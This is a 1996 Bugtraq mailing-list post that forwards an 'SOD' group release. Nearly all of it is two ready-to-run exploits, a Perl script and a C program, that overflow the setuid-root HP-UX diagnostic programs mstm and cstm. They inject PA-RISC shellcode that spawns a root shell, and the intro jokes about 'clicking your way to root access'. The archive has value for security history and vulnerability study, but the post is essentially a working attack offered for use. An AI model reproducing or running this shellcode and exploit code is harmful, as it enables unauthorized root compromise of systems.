Bugtraq archives for 4th quarter (Oct-Dec) 1996: This week: turn me on, dead man
This week: turn me on, dead man
Aleph One (
aleph1
underground.org)
Sat, 16 Nov 1996 11:38:33 -0800
>From our SOD friends. Sponsored by the HP security team & the
energizer bunny. They keep going, and going, and going.
Aleph One / aleph1underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
--- cut here ---
Well, hello. Welcome back. We're glad to see you. Have a drink. Take
off that overcoat. Put down that submachine gun. Lay on the couch and
pretend you're a duck. I'll be over here sending scripts to the
masses. This week's script is the first of the buffer-overruns and it
buggers up two very similar setuid root programs in /usr/diag/bin,
mstm and cstm. It's only been playtested on the 9's, so use with care
on the 10's, and as always, start clicking your way to root access
with scripts from the folks at SOD.
Caveat Emptor
mstm and/or cstm loves you perl script and C src for this week
--- stmo.pl ---
#!/usr/bin/perl
# working exlpoit for 9.X setuid root /usr/diag/bin/[cm]stm
use FileHandle;
sub h2cs {
local($stuff)=_;
local($rv);
while($stuff !~ /^$/) {
$bob=$stuff;
$bob =~ s/^(..).*$/$1/;
$stuff =~ s/^..//;
$rv.=chr(oct("0x${bob}"));
}
return $rv;
}
$code="AA"; # two byte alignment
$code.=h2cs("34010102"); # ldi 129,r1
$code.=h2cs("08220401"); # sub rp,r1,r1
$code.=h2cs("602002a6"); # stb r0,339(r1)
#$code.=h2cs("602002ac"); # stb r0,342(r1)
$code.=h2cs("b43a0298"); # addi 332,r1,arg0
$code.=h2cs("34160176"); # ldi 187,r22
$code.=h2cs("34010276"); # ldi 315,r1
$code.=h2cs("08360216"); # and r22,r1,r22
$code.=h2cs("20200801"); # ldil l%c0000004,r1
$code.=h2cs("e420e008"); # ble 4(sr7,r1)
$code.=h2cs("08210280"); # NOP == xor r1,r1,r0
#$code.=h2cs("deadcafe"); # illegal instruction
$num=208-length($code);
$code.="C"x$num;
$data="/bin/sh.sh.";
$num=16-length($data);
$data.="D"x$num;
$num=224-length($of);
$of=$code.$data;
$of.=h2cs("7b03301B");
print "Length is: ",length($of),"\n";
exec("/usr/diag/bin/mstm","-l","$of");
--- stmo.c ---
/* SOD /usr/diag/bin/[cm]stm buffer overflow */
main()
{
char buf[500];
strcpy(buf,"\x41\x41\x34\x01\x01\x02\x08\x22\x04\x01\x60\x20\x02\xa6\x60\x20\x02\xac\xb4\x3a\x02\x98\x34\x16\x01\x76\x34\x01\x02\x76\x08\x36\x02\x16\x08\x21\x02\x80\x20\x20\x08\x01\xe4\x20\xe0\x08\x08\x21\x02\x80\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x2f\x62\x69\x6e\x2f\x73\x68\x2e\x2d\x69\x2e\x44\x44\x44\x44\x44\x7b\x03\x30\x1b");
execl("/usr/diag/bin/mstm","/usr/diag/bin/mstm","-l",buf,(char *)0);
/* Either-or, same overflow */
execl("/usr/diag/bin/cstm","/usr/diag/bin/cstm","-l",buf,(char *)0);
}
